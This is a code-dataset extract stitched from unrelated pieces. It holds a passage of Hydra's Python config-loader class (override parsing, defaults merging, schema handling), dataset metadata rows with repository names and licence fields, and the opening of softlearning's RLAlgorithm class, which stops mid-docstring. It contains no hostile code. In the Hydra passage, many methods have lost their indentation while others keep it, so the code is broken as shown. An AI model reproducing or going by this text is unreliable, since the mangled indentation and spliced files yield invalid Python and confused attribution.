self.repository: ConfigRepository = ConfigRepository(
config_search_path=config_search_path
)
def split_by_override_type(
self, overrides: List[Override],
) -> Tuple[List[Override], List[Override]]:
config_group_overrides = []
config_overrides = []
for override in overrides:
if not self.repository.group_exists(override.key_or_group):
config_overrides.append(override)
else:
config_group_overrides.append(override)
return config_group_overrides, config_overrides
def missing_config_error(
self, config_name: Optional[str], msg: str, with_search_path: bool
) -> None:
def add_search_path() -> str:
descs = []
for src in self.repository.get_sources():
if src.provider != "schema":
descs.append(f"\t{repr(src)}")
lines = "\n".join(descs)
if with_search_path:
return msg + "\nSearch path:" + f"\n{lines}"
else:
return msg
raise MissingConfigException(
missing_cfg_file=config_name, message=add_search_path()
)
def ensure_main_config_source_available(self) -> None:
for source in self.get_sources():
# if specified, make sure main config search path exists
if source.provider == "main":
if not source.available():
if source.scheme() == "pkg":
if source.path == "":
msg = (
"Primary config module is empty."
"\nPython requires resources to be in a module with an __init__.py file"
)
else:
msg = (
f"Primary config module '{source.path}' not found."
f"\nCheck that it's correct and contains an __init__.py file"
)
else:
msg = (
f"Primary config directory not found."
f"\nCheck that the config directory '{source.path}' exists and readable"
)
self.missing_config_error(
config_name=None, msg=msg, with_search_path=False,
)
def load_configuration(
self,
config_name: Optional[str],
overrides: List[str],
run_mode: RunMode,
strict: Optional[bool] = None,
from_shell: bool = True,
) -> DictConfig:
try:
return self._load_configuration(
config_name=config_name,
overrides=overrides,
run_mode=run_mode,
strict=strict,
from_shell=from_shell,
)
except OmegaConfBaseException as e:
raise ConfigCompositionException() from e
    def _load_configuration(
        self,
        config_name: Optional[str],
        overrides: List[str],
        run_mode: RunMode,
        strict: Optional[bool] = None,
        from_shell: bool = True,
    ) -> DictConfig:
        """Compose the final config from the primary config, defaults and overrides.

        :param config_name: name of the primary config, or None
        :param overrides: raw command-line override strings
        :param run_mode: RUN or MULTIRUN; sweep overrides require MULTIRUN
        :param strict: struct-mode flag for the result (falls back to
            ``self.default_strict`` when None)
        :param from_shell: only affects quoting in one error message
        :return: the composed config (with the ``hydra`` node)
        :raises ConfigCompositionException: on invalid overrides / merge errors
        """
        if config_name is not None and not self.repository.config_exists(config_name):
            self.missing_config_error(
                config_name=config_name,
                msg=f"Cannot find primary config : {config_name}, check that it's in your config search path",
                with_search_path=True,
            )
        if strict is None:
            strict = self.default_strict
        parser = OverridesParser.create()
        parsed_overrides = parser.parse_overrides(overrides=overrides)
        config_overrides = []
        sweep_overrides = []
        # Partition overrides: sweep overrides are only legal in MULTIRUN mode.
        for x in parsed_overrides:
            if x.is_sweep_override():
                if run_mode == RunMode.MULTIRUN:
                    if x.is_hydra_override():
                        raise ConfigCompositionException(
                            f"Sweeping over Hydra's configuration is not supported : '{x.input_line}'"
                        )
                    sweep_overrides.append(x)
                elif run_mode == RunMode.RUN:
                    if x.value_type == ValueType.SIMPLE_CHOICE_SWEEP:
                        # "key=a,b" is ambiguous in RUN mode — ask the user
                        # to disambiguate (list, quoted string, or --multirun).
                        vals = "value1,value2"
                        if from_shell:
                            example_override = f"key=\\'{vals}\\'"
                        else:
                            example_override = f"key='{vals}'"
                        msg = f"""Ambiguous value for argument '{x.input_line}'
1. To use it as a list, use key=[value1,value2]
2. To use it as string, quote the value: {example_override}
3. To sweep over it, add --multirun to your command line"""
                        raise ConfigCompositionException(msg)
                    else:
                        raise ConfigCompositionException(
                            f"Sweep parameters '{x.input_line}' requires --multirun"
                        )
                else:
                    assert False
            else:
                config_overrides.append(x)
        config_group_overrides, config_overrides = self.split_by_override_type(
            config_overrides
        )
        # Load hydra config
        hydra_cfg, _load_trace = self._load_primary_config(cfg_filename="hydra_config")
        # Load job config
        job_cfg, job_cfg_load_trace = self._load_primary_config(
            cfg_filename=config_name, record_load=False
        )
        job_defaults = self._parse_defaults(job_cfg)
        defaults = self._parse_defaults(hydra_cfg)
        # If the job config is backed by a structured config type, promote
        # the hydra config to that type so the later merge type-checks.
        job_cfg_type = OmegaConf.get_type(job_cfg)
        if job_cfg_type is not None and not issubclass(job_cfg_type, dict):
            hydra_cfg._promote(job_cfg_type)
            # during the regular merge later the config will retain the readonly flag.
            _recursive_unset_readonly(hydra_cfg)
            # this is breaking encapsulation a bit. can potentially be implemented in OmegaConf
            hydra_cfg._metadata.ref_type = job_cfg._metadata.ref_type
        OmegaConf.set_readonly(hydra_cfg.hydra, False)
        # if defaults are re-introduced by the promotion, remove it.
        if "defaults" in hydra_cfg:
            with open_dict(hydra_cfg):
                del hydra_cfg["defaults"]
        if config_name is not None:
            # Placeholder marking where the primary config itself merges in.
            defaults.append(DefaultElement(config_group=None, config_name="__SELF__"))
        split_at = len(defaults)
        self._combine_default_lists(defaults, job_defaults)
        ConfigLoaderImpl._apply_overrides_to_defaults(config_group_overrides, defaults)
        # Load the defaults and merge them into cfg
        try:
            cfg = self._merge_defaults_into_config(
                hydra_cfg,
                job_cfg,
                job_cfg_load_trace,
                defaults,
                split_at,
                run_mode=run_mode,
            )
        except UnspecifiedMandatoryDefault as e:
            options = self.get_group_options(e.config_group)
            opt_list = "\n".join(["\t" + x for x in options])
            msg = (
                f"You must specify '{e.config_group}', e.g, {e.config_group}=<OPTION>"
                f"\nAvailable options:"
                f"\n{opt_list}"
            )
            raise ConfigCompositionException(msg) from e
        OmegaConf.set_struct(cfg.hydra, True)
        OmegaConf.set_struct(cfg, strict)
        # Apply command line overrides after enabling strict flag
        ConfigLoaderImpl._apply_overrides_to_config(config_overrides, cfg)
        # Record the input lines under hydra.overrides for reproducibility.
        app_overrides = []
        for override in parsed_overrides:
            if override.is_hydra_override():
                cfg.hydra.overrides.hydra.append(override.input_line)
            else:
                cfg.hydra.overrides.task.append(override.input_line)
                app_overrides.append(override)
        with open_dict(cfg.hydra.job):
            if "name" not in cfg.hydra.job:
                cfg.hydra.job.name = JobRuntime().get("name")
            cfg.hydra.job.override_dirname = get_overrides_dirname(
                overrides=app_overrides,
                kv_sep=cfg.hydra.job.config.override_dirname.kv_sep,
                item_sep=cfg.hydra.job.config.override_dirname.item_sep,
                exclude_keys=cfg.hydra.job.config.override_dirname.exclude_keys,
            )
            cfg.hydra.job.config_name = config_name
            # Copy the requested environment variables into the config.
            for key in cfg.hydra.job.env_copy:
                cfg.hydra.job.env_set[key] = os.environ[key]
        return cfg
def load_sweep_config(
self, master_config: DictConfig, sweep_overrides: List[str]
) -> DictConfig:
# Recreate the config for this sweep instance with the appropriate overrides
overrides = OmegaConf.to_container(master_config.hydra.overrides.hydra)
assert isinstance(overrides, list)
overrides = overrides + sweep_overrides
sweep_config = self.load_configuration(
config_name=master_config.hydra.job.config_name,
strict=self.default_strict,
overrides=overrides,
run_mode=RunMode.RUN,
)
with open_dict(sweep_config):
sweep_config.hydra.runtime.merge_with(master_config.hydra.runtime)
# Partial copy of master config cache, to ensure we get the same resolved values for timestamps
cache: Dict[str, Any] = defaultdict(dict, {})
cache_master_config = OmegaConf.get_cache(master_config)
for k in ["now"]:
if k in cache_master_config:
cache[k] = cache_master_config[k]
OmegaConf.set_cache(sweep_config, cache)
return sweep_config
    def get_search_path(self) -> ConfigSearchPath:
        """Return the config search path this loader was created with."""
        return self.config_search_path
    def get_load_history(self) -> List[LoadTrace]:
        """
        Returns a deep copy of the load history (which configs were attempted
        to load, and whether they were loaded successfully or not).
        """
        return copy.deepcopy(self.all_config_checked)
@staticmethod
def is_matching(override: Override, default: DefaultElement) -> bool:
assert override.key_or_group == default.config_group
if override.is_delete():
return override.get_subject_package() == default.package
else:
return override.key_or_group == default.config_group and (
override.pkg1 == default.package
or override.pkg1 == ""
and default.package is None
)
@staticmethod
def find_matches(
key_to_defaults: Dict[str, List[IndexedDefaultElement]], override: Override,
) -> List[IndexedDefaultElement]:
matches: List[IndexedDefaultElement] = []
for default in key_to_defaults[override.key_or_group]:
if ConfigLoaderImpl.is_matching(override, default.default):
matches.append(default)
return matches
    @staticmethod
    def _apply_overrides_to_defaults(
        overrides: List[Override], defaults: List[DefaultElement],
    ) -> None:
        """Mutate the *defaults* list according to config-group overrides.

        Supports override (``group=option``), append (``+group=option``),
        delete (``~group[=option]``) and package rename
        (``group@src:dst[=option]``).  Raises ConfigCompositionException
        when an override cannot be applied.
        """
        # Index the defaults by config group for quick matching.
        key_to_defaults: Dict[str, List[IndexedDefaultElement]] = defaultdict(list)
        for idx, default in enumerate(defaults):
            if default.config_group is not None:
                key_to_defaults[default.config_group].append(
                    IndexedDefaultElement(idx=idx, default=default)
                )
        for override in overrides:
            value = override.value()
            if value is None:
                if override.is_add():
                    ConfigLoaderImpl._raise_parse_override_error(override.input_line)
                if not override.is_delete():
                    # Legacy deletion syntax (group=null): convert to a
                    # delete, but warn that it is deprecated.
                    override.type = OverrideType.DEL
                    msg = (
                        "\nRemoving from the defaults list by assigning 'null' "
                        "is deprecated and will be removed in Hydra 1.1."
                        f"\nUse ~{override.key_or_group}"
                    )
                    warnings.warn(category=UserWarning, message=msg)
            if (
                not (override.is_delete() or override.is_package_rename())
                and value is None
            ):
                ConfigLoaderImpl._raise_parse_override_error(override.input_line)
            if override.is_add() and override.is_package_rename():
                raise ConfigCompositionException(
                    "Add syntax does not support package rename, remove + prefix"
                )
            matches = ConfigLoaderImpl.find_matches(key_to_defaults, override)
            if isinstance(value, (list, dict)):
                raise ConfigCompositionException(
                    f"Config group override value type cannot be a {type(value).__name__}"
                )
            if override.is_delete():
                src = override.get_source_item()
                if len(matches) == 0:
                    raise ConfigCompositionException(
                        f"Could not delete. No match for '{src}' in the defaults list."
                    )
                for pair in matches:
                    if value is not None and value != defaults[pair.idx].config_name:
                        raise ConfigCompositionException(
                            f"Could not delete. No match for '{src}={value}' in the defaults list."
                        )
                    del defaults[pair.idx]
            elif override.is_add():
                if len(matches) > 0:
                    src = override.get_source_item()
                    raise ConfigCompositionException(
                        f"Could not add. An item matching '{src}' is already in the defaults list."
                    )
                assert value is not None
                defaults.append(
                    DefaultElement(
                        config_group=override.key_or_group,
                        config_name=str(value),
                        package=override.get_subject_package(),
                    )
                )
            else:
                assert value is not None
                # override (and/or package rename) applied to every match
                for match in matches:
                    default = match.default
                    default.config_name = str(value)
                    if override.is_package_rename():
                        default.package = override.get_subject_package()
                if len(matches) == 0:
                    src = override.get_source_item()
                    if override.is_package_rename():
                        msg = f"Could not rename package. No match for '{src}' in the defaults list."
                    else:
                        msg = (
                            f"Could not override '{src}'. No match in the defaults list."
                            f"\nTo append to your default list use +{override.input_line}"
                        )
                    raise ConfigCompositionException(msg)
@staticmethod
def _split_group(group_with_package: str) -> Tuple[str, Optional[str]]:
idx = group_with_package.find("@")
if idx == -1:
# group
group = group_with_package
package = None
else:
# group@package
group = group_with_package[0:idx]
package = group_with_package[idx + 1 :]
return group, package
    @staticmethod
    def _apply_overrides_to_config(overrides: List[Override], cfg: DictConfig) -> None:
        """Apply plain (non config-group) overrides directly onto *cfg*.

        Handles delete (``~key[=value]``), add (``+key=value``) and plain
        ``key=value`` updates; any OmegaConf error is wrapped in a
        ConfigCompositionException.
        """
        for override in overrides:
            # A package annotation only makes sense on a config-group override.
            if override.get_subject_package() is not None:
                raise ConfigCompositionException(
                    f"Override {override.input_line} looks like a config group override, "
                    f"but config group '{override.key_or_group}' does not exist."
                )
            key = override.key_or_group
            value = override.value()
            try:
                if override.is_delete():
                    config_val = OmegaConf.select(cfg, key, throw_on_missing=False)
                    if config_val is None:
                        raise ConfigCompositionException(
                            f"Could not delete from config. '{override.key_or_group}' does not exist."
                        )
                    elif value is not None and value != config_val:
                        raise ConfigCompositionException(
                            f"Could not delete from config."
                            f" The value of '{override.key_or_group}' is {config_val} and not {value}."
                        )
                    # Delete the leaf from its parent node (or the root).
                    last_dot = key.rfind(".")
                    with open_dict(cfg):
                        if last_dot == -1:
                            del cfg[key]
                        else:
                            node = OmegaConf.select(cfg, key[0:last_dot])
                            del node[key[last_dot + 1 :]]
                elif override.is_add():
                    if OmegaConf.select(cfg, key, throw_on_missing=False) is None:
                        with open_dict(cfg):
                            OmegaConf.update(cfg, key, value)
                    else:
                        raise ConfigCompositionException(
                            f"Could not append to config. An item is already at '{override.key_or_group}'."
                        )
                else:
                    try:
                        OmegaConf.update(cfg, key, value)
                    except (ConfigAttributeError, ConfigKeyError) as ex:
                        raise ConfigCompositionException(
                            f"Could not override '{override.key_or_group}'. No match in config."
                            f"\nTo append to your config use +{override.input_line}"
                        ) from ex
            except OmegaConfBaseException as ex:
                raise ConfigCompositionException(
                    f"Error merging override {override.input_line}"
                ) from ex
@staticmethod
def _raise_parse_override_error(override: Optional[str]) -> None:
msg = (
f"Error parsing config group override : '{override}'"
f"\nAccepted forms:"
f"\n\tOverride: key=value, key@package=value, key@src_pkg:dest_pkg=value, key@src_pkg:dest_pkg"
f"\n\tAppend: +key=value, +key@package=value"
f"\n\tDelete: ~key, ~key@pkg, ~key=value, ~key@pkg=value"
f"\n"
f"\nSee https://hydra.cc/docs/next/advanced/override_grammar/basic for details"
)
raise ConfigCompositionException(msg)
def _record_loading(
self,
name: str,
path: Optional[str],
provider: Optional[str],
schema_provider: Optional[str],
record_load: bool,
) -> Optional[LoadTrace]:
trace = LoadTrace(
filename=name,
path=path,
provider=provider,
schema_provider=schema_provider,
)
if record_load:
self.all_config_checked.append(trace)
return trace
    @staticmethod
    def _combine_default_lists(
        primary: List[DefaultElement], merged_list: List[DefaultElement]
    ) -> None:
        """Merge *merged_list* into *primary* in place.

        An element of merged_list whose config_group already appears in
        primary replaces the primary entry at the same position; all
        remaining elements are appended.  merged_list itself is also
        mutated: matched elements are removed from it.
        """
        key_to_idx = {}
        for idx, d in enumerate(primary):
            if d.config_group is not None:
                key_to_idx[d.config_group] = idx
        # Iterate over a deep copy: the copied element is written into
        # primary while an equal original is removed from merged_list.
        for d in copy.deepcopy(merged_list):
            if d.config_group is not None:
                if d.config_group in key_to_idx.keys():
                    idx = key_to_idx[d.config_group]
                    primary[idx] = d
                    merged_list.remove(d)
        # append remaining items that were not matched to existing keys
        for d in merged_list:
            primary.append(d)
    def _load_config_impl(
        self,
        input_file: str,
        package_override: Optional[str],
        is_primary_config: bool,
        record_load: bool = True,
    ) -> Tuple[Optional[DictConfig], Optional[LoadTrace]]:
        """Load one config file from the repository, merging a matching schema when one exists.

        :param input_file: name/path of the config to load
        :param package_override: optional package overriding the config's own package
        :param is_primary_config: whether this is the job's primary config
        :param record_load: if True, append a LoadTrace to self.all_config_checked
        :return: (config, trace) — the loaded (schema-merged) config, or (None, trace) if not found
        """
        ret = self.repository.load_config(
            config_path=input_file,
            is_primary_config=is_primary_config,
            package_override=package_override,
        )
        if ret is not None:
            if not isinstance(ret.config, DictConfig):
                raise ValueError(
                    f"Config {input_file} must be a Dictionary, got {type(ret).__name__}"
                )
            # Schema sources are not re-validated against themselves.
            if not ret.is_schema_source:
                try:
                    schema_source = self.repository.get_schema_source()
                    config_path = ConfigSource._normalize_file_name(filename=input_file)
                    schema = schema_source.load_config(
                        config_path,
                        is_primary_config=is_primary_config,
                        package_override=package_override,
                    )
                    try:
                        if is_primary_config:
                            # Add as placeholders for hydra and defaults to allow
                            # overriding them from the config even if not in schema
                            schema.config = OmegaConf.merge(
                                {"hydra": None, "defaults": []}, schema.config,
                            )
                        # Schema first so the config is validated against it.
                        merged = OmegaConf.merge(schema.config, ret.config)
                        assert isinstance(merged, DictConfig)
                        # remove placeholders if unused
                        with open_dict(merged):
                            if "hydra" in merged and merged.hydra is None:
                                del merged["hydra"]
                            if "defaults" in merged and merged["defaults"] == []:
                                del merged["defaults"]
                    except OmegaConfBaseException as e:
                        raise ConfigCompositionException(
                            f"Error merging '{input_file}' with schema"
                        ) from e
                    assert isinstance(merged, DictConfig)
                    return (
                        merged,
                        self._record_loading(
                            name=input_file,
                            path=ret.path,
                            provider=ret.provider,
                            schema_provider=schema.provider,
                            record_load=record_load,
                        ),
                    )
                except ConfigLoadError:
                    # schema not found, ignore
                    pass
            # No schema merged: return the raw config as loaded.
            return (
                ret.config,
                self._record_loading(
                    name=input_file,
                    path=ret.path,
                    provider=ret.provider,
                    schema_provider=None,
                    record_load=record_load,
                ),
            )
        else:
            # Config not found: still record the (failed) lookup for diagnostics.
            return (
                None,
                self._record_loading(
                    name=input_file,
                    path=None,
                    provider=None,
                    schema_provider=None,
                    record_load=record_load,
                ),
            )
def list_groups(self, parent_name: str) -> List[str]:
return self.get_group_options(
group_name=parent_name, results_filter=ObjectType.GROUP
)
def get_group_options(
self, group_name: str, results_filter: Optional[ObjectType] = ObjectType.CONFIG
) -> List[str]:
return self.repository.get_group_options(group_name, results_filter)
    def _merge_config(
        self,
        cfg: DictConfig,
        config_group: str,
        name: str,
        required: bool,
        is_primary_config: bool,
        package_override: Optional[str],
    ) -> DictConfig:
        """Load `name` (from `config_group` when non-empty) and merge it into `cfg`.

        Raises MissingConfigException when the config is not found and `required`
        is True; returns `cfg` unchanged when the config is optional and missing.
        """
        try:
            if config_group != "":
                new_cfg = f"{config_group}/{name}"
            else:
                new_cfg = name
            loaded_cfg, _ = self._load_config_impl(
                new_cfg,
                is_primary_config=is_primary_config,
                package_override=package_override,
            )
            if loaded_cfg is None:
                if required:
                    if config_group == "":
                        msg = f"Could not load {new_cfg}"
                        raise MissingConfigException(msg, new_cfg)
                    else:
                        # Include the group's available options in the error
                        # message to help the user pick a valid one.
                        options = self.get_group_options(config_group)
                        if options:
                            opt_list = "\n".join(["\t" + x for x in options])
                            msg = (
                                f"Could not load {new_cfg}.\nAvailable options:"
                                f"\n{opt_list}"
                            )
                        else:
                            msg = f"Could not load {new_cfg}"
                        raise MissingConfigException(msg, new_cfg, options)
                else:
                    # Optional config that is missing: nothing to merge.
                    return cfg
            else:
                ret = OmegaConf.merge(cfg, loaded_cfg)
                assert isinstance(ret, DictConfig)
                return ret
        except OmegaConfBaseException as ex:
            raise ConfigCompositionException(
                f"Error merging {config_group}={name}"
            ) from ex
    def _merge_defaults_into_config(
        self,
        hydra_cfg: DictConfig,
        job_cfg: DictConfig,
        job_cfg_load_trace: Optional[LoadTrace],
        defaults: List[DefaultElement],
        split_at: int,
        run_mode: RunMode,
    ) -> DictConfig:
        """Merge the defaults list into hydra_cfg in order.

        The first `split_at` elements are treated as the system (Hydra) defaults
        and merged before the remaining user defaults. The sentinel config name
        "__SELF__" marks where `job_cfg` itself is merged; "_SKIP_" entries are
        ignored.
        """
        def merge_defaults_list_into_config(
            merged_cfg: DictConfig, def_list: List[DefaultElement]
        ) -> DictConfig:
            # Reconstruct the defaults to make use of the interpolation capabilities of OmegaConf.
            dict_with_list = OmegaConf.create({"defaults": []})
            for item in def_list:
                d: Any
                if item.config_group is not None:
                    d = {item.config_group: item.config_name}
                else:
                    d = item.config_name
                dict_with_list.defaults.append(d)
            for idx, default1 in enumerate(def_list):
                if default1.config_group is not None:
                    # A group whose value is still MISSING after interpolation
                    # must be supplied on the command line (in RUN mode).
                    if OmegaConf.is_missing(
                        dict_with_list.defaults[idx], default1.config_group
                    ):
                        if run_mode == RunMode.RUN:
                            raise UnspecifiedMandatoryDefault(
                                config_group=default1.config_group
                            )
                        else:
                            config_name = "???"
                    else:
                        config_name = dict_with_list.defaults[idx][
                            default1.config_group
                        ]
                else:
                    config_name = dict_with_list.defaults[idx]
                if config_name == "__SELF__":
                    # Merge the job config itself at this position; its own
                    # defaults list has already been processed, so drop it.
                    if "defaults" in job_cfg:
                        with open_dict(job_cfg):
                            del job_cfg["defaults"]
                    merged_cfg.merge_with(job_cfg)
                    if job_cfg_load_trace is not None:
                        self.all_config_checked.append(job_cfg_load_trace)
                elif default1.config_group is not None:
                    if default1.config_name not in (None, "_SKIP_", "???"):
                        merged_cfg = self._merge_config(
                            cfg=merged_cfg,
                            config_group=default1.config_group,
                            name=config_name,
                            required=not default1.optional,
                            is_primary_config=False,
                            package_override=default1.package,
                        )
                else:
                    if default1.config_name != "_SKIP_":
                        merged_cfg = self._merge_config(
                            cfg=merged_cfg,
                            config_group="",
                            name=config_name,
                            required=True,
                            is_primary_config=False,
                            package_override=default1.package,
                        )
            return merged_cfg
        # Split the defaults into system (first split_at) and user lists.
        system_list: List[DefaultElement] = []
        user_list: List[DefaultElement] = []
        for default in defaults:
            if len(system_list) < split_at:
                system_list.append(default)
            else:
                user_list.append(default)
        hydra_cfg = merge_defaults_list_into_config(hydra_cfg, system_list)
        hydra_cfg = merge_defaults_list_into_config(hydra_cfg, user_list)
        # The defaults list is composition metadata, not part of the final config.
        if "defaults" in hydra_cfg:
            del hydra_cfg["defaults"]
        return hydra_cfg
def _load_primary_config(
self, cfg_filename: Optional[str], record_load: bool = True
) -> Tuple[DictConfig, Optional[LoadTrace]]:
if cfg_filename is None:
cfg = OmegaConf.create()
assert isinstance(cfg, DictConfig)
load_trace = None
else:
ret, load_trace = self._load_config_impl(
cfg_filename,
is_primary_config=True,
package_override=None,
record_load=record_load,
)
assert ret is not None
cfg = ret
return cfg, load_trace
    @staticmethod
    def _parse_defaults(cfg: DictConfig) -> List[DefaultElement]:
        """Parse cfg's `defaults` list into DefaultElement objects.

        Each entry is either a plain string (a config name) or a single-key
        mapping {group[@package]: name}, optionally carrying `optional: true`.
        """
        valid_example = """
        Example of a valid defaults:
        defaults:
          - dataset: imagenet
          - model: alexnet
            optional: true
          - optimizer: nesterov
        """
        if "defaults" in cfg:
            defaults = cfg.defaults
        else:
            defaults = OmegaConf.create([])
        if not isinstance(defaults, ListConfig):
            raise ValueError(
                "defaults must be a list because composition is order sensitive, "
                + valid_example
            )
        assert isinstance(defaults, ListConfig)
        res: List[DefaultElement] = []
        for item in defaults:
            if isinstance(item, DictConfig):
                optional = False
                if "optional" in item:
                    # pop() removes the marker so only the group key remains.
                    optional = item.pop("optional")
                keys = list(item.keys())
                if len(keys) > 1:
                    raise ValueError(f"Too many keys in default item {item}")
                if len(keys) == 0:
                    raise ValueError(f"Missing group name in {item}")
                key = keys[0]
                # Split "group@package" into its two parts.
                config_group, package = ConfigLoaderImpl._split_group(key)
                # Use the raw node so interpolations are not resolved here.
                node = item._get_node(key)
                assert node is not None
                config_name = node._value()
                default = DefaultElement(
                    config_group=config_group,
                    config_name=config_name,
                    package=package,
                    optional=optional,
                )
            elif isinstance(item, str):
                default = DefaultElement(config_group=None, config_name=item)
            else:
                raise ValueError(
                    f"Unsupported type in defaults : {type(item).__name__}"
                )
            res.append(default)
        return res
def get_sources(self) -> List[ConfigSource]:
return self.repository.get_sources()
def get_overrides_dirname(
    overrides: List[Override], exclude_keys: List[str], item_sep: str, kv_sep: str,
) -> str:
    """Build a directory-name string from the given overrides.

    Overrides whose key appears in exclude_keys are dropped; the remaining
    input lines are sorted, joined with item_sep, and each '=' replaced with
    kv_sep.
    """
    kept = []
    for override in overrides:
        if override.key_or_group in exclude_keys:
            continue
        assert override.input_line is not None
        kept.append(override.input_line)
    joined = item_sep.join(sorted(kept))
    # re.sub (not str.replace) keeps the original's escape semantics for kv_sep.
    return re.sub(pattern="[=]", repl=kv_sep, string=joined)
def _recursive_unset_readonly(cfg: Container) -> None:
    """Clear the readonly flag on cfg and, recursively, on all of its children."""
    if isinstance(cfg, DictConfig):
        OmegaConf.set_readonly(cfg, None)
        if cfg._is_missing():
            return
        # resolve=False: walk raw child nodes without triggering interpolation.
        for _, child in cfg.items_ex(resolve=False):
            _recursive_unset_readonly(child)
    elif isinstance(cfg, ListConfig):
        OmegaConf.set_readonly(cfg, None)
        if cfg._is_missing():
            return
        for child in cfg:
            _recursive_unset_readonly(child)
| 38.59516
| 110
| 0.538751
|
4a110020251a8c39b7b4c1670f90c3cd9112631a
| 15,644
|
py
|
Python
|
softlearning/algorithms/rl_algorithm.py
|
zhaofeng-shu33/softlearning
|
b4db23ad266f594c891357d9dabe981ecf9bcdea
|
[
"MIT"
] | 1
|
2019-06-12T16:18:49.000Z
|
2019-06-12T16:18:49.000Z
|
softlearning/algorithms/rl_algorithm.py
|
GitHubBeinner/softlearning
|
b4db23ad266f594c891357d9dabe981ecf9bcdea
|
[
"MIT"
] | null | null | null |
softlearning/algorithms/rl_algorithm.py
|
GitHubBeinner/softlearning
|
b4db23ad266f594c891357d9dabe981ecf9bcdea
|
[
"MIT"
] | null | null | null |
import abc
from collections import OrderedDict
from distutils.version import LooseVersion
from itertools import count
import gtimer as gt
import math
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.training import training_util
from softlearning.samplers import rollouts
from softlearning.misc.utils import save_video
if LooseVersion(tf.__version__) > LooseVersion("2.00"):
from tensorflow.python.training.tracking.tracking import (
AutoTrackable as Checkpointable)
else:
from tensorflow.contrib.checkpoint import Checkpointable
class RLAlgorithm(Checkpointable):
    """Abstract RLAlgorithm.
    Implements the _train and _evaluate methods to be used
    by classes inheriting from RLAlgorithm.
    """
    def __init__(
            self,
            sampler,
            n_epochs=1000,
            train_every_n_steps=1,
            n_train_repeat=1,
            max_train_repeat_per_timestep=5,
            n_initial_exploration_steps=0,
            initial_exploration_policy=None,
            epoch_length=1000,
            eval_n_episodes=10,
            eval_deterministic=True,
            eval_render_kwargs=None,
            video_save_frequency=0,
            session=None,
    ):
        """
        Args:
            n_epochs (`int`): Number of epochs to run the training for.
            n_train_repeat (`int`): Number of times to repeat the training
                for single time step.
            n_initial_exploration_steps: Number of steps in the beginning to
                take using actions drawn from a separate exploration policy.
            epoch_length (`int`): Epoch length.
            eval_n_episodes (`int`): Number of rollouts to evaluate.
            eval_deterministic (`int`): Whether or not to run the policy in
                deterministic mode when evaluating policy.
            eval_render_kwargs (`None`, `dict`): Arguments to be passed for
                rendering evaluation rollouts. `None` to disable rendering.
        """
        self.sampler = sampler
        self._n_epochs = n_epochs
        self._n_train_repeat = n_train_repeat
        # Cap can never be lower than the per-timestep repeat count.
        self._max_train_repeat_per_timestep = max(
            max_train_repeat_per_timestep, n_train_repeat)
        self._train_every_n_steps = train_every_n_steps
        self._epoch_length = epoch_length
        self._n_initial_exploration_steps = n_initial_exploration_steps
        self._initial_exploration_policy = initial_exploration_policy
        self._eval_n_episodes = eval_n_episodes
        self._eval_deterministic = eval_deterministic
        self._video_save_frequency = video_save_frequency
        self._eval_render_kwargs = eval_render_kwargs or {}
        if self._video_save_frequency > 0:
            # Saving video frames requires an offscreen render mode.
            render_mode = self._eval_render_kwargs.pop('mode', 'rgb_array')
            assert render_mode != 'human', (
                "RlAlgorithm cannot render and save videos at the same time")
            self._eval_render_kwargs['mode'] = render_mode
        self._session = session or tf.keras.backend.get_session()
        # Progress counters; _epoch/_timestep are also restored by __setstate__.
        self._epoch = 0
        self._timestep = 0
        self._num_train_steps = 0
    def _build(self):
        # Subclasses extend this to register their training ops.
        self._training_ops = {}
        self._init_global_step()
        self._init_placeholders()
    def _init_global_step(self):
        # The global step is incremented once per run of self._training_ops.
        self.global_step = training_util.get_or_create_global_step()
        self._training_ops.update({
            'increment_global_step': training_util._increment_global_step(1)
        })
    def _init_placeholders(self):
        """Create input placeholders for the SAC algorithm.
        Creates `tf.placeholder`s for:
            - observation
            - next observation
            - action
            - reward
            - terminals
        """
        # NOTE(review): relies on self._training_environment being set by the
        # subclass before _build() is called — confirm in subclasses.
        self._placeholders = {
            'observations': {
                name: tf.compat.v1.placeholder(
                    dtype=(
                        np.float32
                        if np.issubdtype(observation_space.dtype, np.floating)
                        else observation_space.dtype
                    ),
                    shape=(None, *observation_space.shape),
                    name=name)
                for name, observation_space
                in self._training_environment.observation_space.spaces.items()
            },
            'next_observations': {
                name: tf.compat.v1.placeholder(
                    dtype=(
                        np.float32
                        if np.issubdtype(observation_space.dtype, np.floating)
                        else observation_space.dtype
                    ),
                    shape=(None, *observation_space.shape),
                    name=name)
                for name, observation_space
                in self._training_environment.observation_space.spaces.items()
            },
            'actions': tf.compat.v1.placeholder(
                dtype=tf.float32,
                shape=(None, *self._training_environment.action_space.shape),
                name='actions',
            ),
            'rewards': tf.compat.v1.placeholder(
                tf.float32,
                shape=(None, 1),
                name='rewards',
            ),
            'terminals': tf.compat.v1.placeholder(
                tf.bool,
                shape=(None, 1),
                name='terminals',
            ),
            'iteration': tf.compat.v1.placeholder(
                tf.int64, shape=(), name='iteration',
            ),
        }
    def _initial_exploration_hook(self, env, initial_exploration_policy, pool):
        # Seed the replay pool with samples from a separate exploration policy.
        if self._n_initial_exploration_steps < 1: return
        if not initial_exploration_policy:
            raise ValueError(
                "Initial exploration policy must be provided when"
                " n_initial_exploration_steps > 0.")
        self.sampler.initialize(env, initial_exploration_policy, pool)
        while pool.size < self._n_initial_exploration_steps:
            self.sampler.sample()
    def _training_before_hook(self):
        """Method called before the actual training loops."""
        pass
    def _training_after_hook(self):
        """Method called after the actual training loops."""
        pass
    def _timestep_before_hook(self, *args, **kwargs):
        """Hook called at the beginning of each timestep."""
        pass
    def _timestep_after_hook(self, *args, **kwargs):
        """Hook called at the end of each timestep."""
        pass
    def _epoch_before_hook(self):
        """Hook called at the beginning of each epoch."""
        self._train_steps_this_epoch = 0
    def _epoch_after_hook(self, *args, **kwargs):
        """Hook called at the end of each epoch."""
        pass
    def _training_batch(self, batch_size=None):
        # Draw a random minibatch from the sampler's pool.
        return self.sampler.random_batch(batch_size)
    def _evaluation_batch(self, *args, **kwargs):
        # By default evaluation diagnostics use the same batches as training.
        return self._training_batch(*args, **kwargs)
    @property
    def _training_started(self):
        # True once at least one environment step has been taken.
        return self._total_timestep > 0
    @property
    def _total_timestep(self):
        # Global step count across epochs: completed epochs plus this epoch's steps.
        total_timestep = self._epoch * self._epoch_length + self._timestep
        return total_timestep
    def train(self, *args, **kwargs):
        """Initiate training of the SAC instance."""
        return self._train(*args, **kwargs)
    def _train(self):
        """Return a generator that performs RL training.
        Args:
            env (`SoftlearningEnv`): Environment used for training.
            policy (`Policy`): Policy used for training
